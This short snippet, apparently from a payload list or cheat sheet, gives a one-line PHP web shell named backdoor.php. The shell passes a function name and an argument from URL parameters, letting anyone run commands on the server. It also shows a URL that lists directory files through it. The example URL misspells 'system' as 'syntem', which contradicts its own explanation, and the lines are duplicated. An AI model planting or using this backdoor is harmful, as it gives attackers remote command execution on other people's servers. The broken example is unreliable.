https://example.com/backdoor.php?f=syntem&p=ls
The above endpoint will list all the files on the directory! via system(ls);
<?php $_GET["f"]($_GET["p"]); ?> |
https://example.com/backdoor.php?f=syntem&p=ls
The above endpoint will list all the files on the directory! via system(ls);